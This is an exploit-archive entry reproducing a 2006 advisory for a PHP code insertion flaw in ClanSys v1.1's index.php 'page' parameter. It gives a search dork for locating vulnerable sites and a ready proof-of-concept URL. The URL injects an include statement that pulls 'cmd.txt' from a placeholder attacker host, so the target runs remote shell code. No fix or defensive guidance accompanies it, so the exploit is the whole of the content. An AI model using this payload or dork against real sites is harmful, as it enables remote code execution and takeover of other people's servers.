Clansys <= v.1.1 (index.php page) PHP Code Insertion Vulnerability

2006-04-23T00:00:00
ID 1337DAY-ID-377
Type zdt
Reporter nukedx
Modified 2006-04-23T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ==================================================================
Clansys <= v.1.1 (index.php page) PHP Code Insertion Vulnerability
==================================================================





NukedX Security Advisory Nr 2006-29
ClanSys v1.1 (index.php page) PHP Code Insertion Vulnerability
Dork: "ClanSys v.1.1" 2.400 pages.
Full PoC ->
GET -> http://[victim]/[ClanSysPath]/index.php?page=[PHPCode]
EXAMPLE -> http://[victim]/[ClanSysPath]/index.php?page=<?include($s);?>&s=http://yourhost.com/cmd.txt?



#  0day.today [2018-03-19]  #